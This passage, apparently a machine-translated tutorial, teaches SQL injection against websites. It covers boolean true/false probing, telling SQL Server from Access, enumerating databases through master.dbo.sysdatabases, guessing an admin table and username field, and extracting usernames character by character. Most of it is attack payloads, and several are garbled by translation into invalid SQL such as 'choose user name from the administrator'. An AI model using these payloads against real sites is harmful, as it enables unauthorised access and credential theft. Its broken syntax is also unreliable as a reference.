2. If there is an injection vulnerability followed by 1= 1, 1= 1 is a logical value of true, then the webpage returns to normal, just like the original webpage.

3, followed by 1=2 is the logical value false, and the whole statement is false, so an exception page is returned.

After judging that there are injection vulnerabilities, you can construct SQL statements to guess.

SQL database can use a method called burst field, and ACCESS must guess one character at a time.

First, judge the database type.

URL sum (select count (*) from sysobjects) > 0; -return to normal sql server.

URL sum (select count (*) from msysobjects) > 0; -Resume normal access.

The method of SQL database explosion:

URL and 0< (select count (*) from master.dbo.sysdatabases); -Number of databases obtained by halving method

URL and 0< (select count (*) from master.dbo.sysdatabases where name > 1 and dbid =1); -Broke the name of the library

-Submit dbid = 2.3.4 ... to get more database names.

If you know the SQL language, you should be able to bypass analogy.

Interview guess:

URL and exists (select * from admin); -Guess the management table name

URL and presence (choose user name from the administrator); Guess the user name field

Url and existence (choose id from admin, where len (username) = 5) guess the length of the user name.

Guess the length and guess the characters one by one.

URL and exists (select id from admin, where asc(mid(username, 1, 1))=97, ID= 1).